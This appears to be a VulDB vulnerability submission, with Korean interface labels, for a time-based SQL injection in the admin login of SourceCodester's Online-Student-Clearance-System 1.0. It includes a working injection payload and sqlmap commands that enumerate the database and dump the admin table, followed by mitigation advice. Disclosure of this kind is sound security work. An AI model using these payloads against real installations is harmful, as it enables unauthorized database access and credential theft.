| 제목 | SourceCodester Online-Student-Clearance-System 1.0 SQL Injection |
|---|
| 설명 | Vulnerabilty Summary: SQL Injection (Time Based) in Online-Student-Clearance-System
**Critical Security Advisory**
Affected System: Online-Student-Clearance-System (Version ≤1.0)
Vulnerability Type:SQL Injection (CWE-89)
Severity Level:CRITICAL (CVSS: 9.1)
Discovered By Anuj Sharma
Vendor Homepage: (https://www.sourcecodester.com/)
Software Link: (https://www.sourcecodester.com/php/17892/online-clearance-system.html)
Core Vulnerability:
Online-Student-Clearance-System improperly concatenate unsanitized user input into SQL queries, enabling full database compromise through.
Vulnerable Parameter: Username
Affected URL: http://localhost/student_clearance_system/Admin/login.php
Proof of concept:
Submitting the following payload in the username and password fields:
txtusername=test ' AND (SELECT 1824 FROM (SELECT(SLEEP(5)))nyKW) AND 'amlx'='amLx&txtpassword=test
SQLmap which is sql injection exploitation tool can assist in exploitation by giving command.
sqlmap -u http://localhost/student_clearance_system/Admin/login.php --dbs --batch
It fetches the databases names. Then tables can be fetched using command:
sqlmap -u http://localhost/student_clearance_system/Admin/login.php -D student_clearance --tables
further give table name like this to retrieve information of 'admin' table and dump all the information.
sqlmap -u http://localhost/student_clearance_system/Admin/login.php -D student_clearance -T admin --dump
More details are provided in my github page.
Mitigation:
Immediate: Implement prepared statements
Short-term: Add input validation
Long-term: Consider migrating to an ORM framework
Disclosure Timeline:
- 0-Day → Vendor notified
- 7 Days → Public disclosure (if unpatched)
References:
- OWASP Top 10 2021: A03 Injection
- NIST SP 800-115: SQLi Countermeasures
- HIPAA Security Rule §164.308(a)(5)
This vulnerability enables complete system compromise and requires emergency remediation. Organizations should assume breach and conduct forensic audits if exposed.
|
|---|
| 원천 | ⚠️ https://github.com/cybersharmaji/Online-Student-Clearance-System/blob/main/sql_injection_time.md |
|---|
| 사용자 | esharmaji (UID 84358) |
|---|
| 제출 | 2025. 04. 23. PM 05:14 (12 개월 ago) |
|---|
| 모더레이션 | 2025. 05. 05. PM 05:11 (12 days later) |
|---|
| 상태 | 수락 |
|---|
| VulDB 항목 | 307432 [SourceCodester Online Student Clearance System 1.0 /Admin/login.php id/username/password SQL 주입] |
|---|
| 포인트들 | 20 |
|---|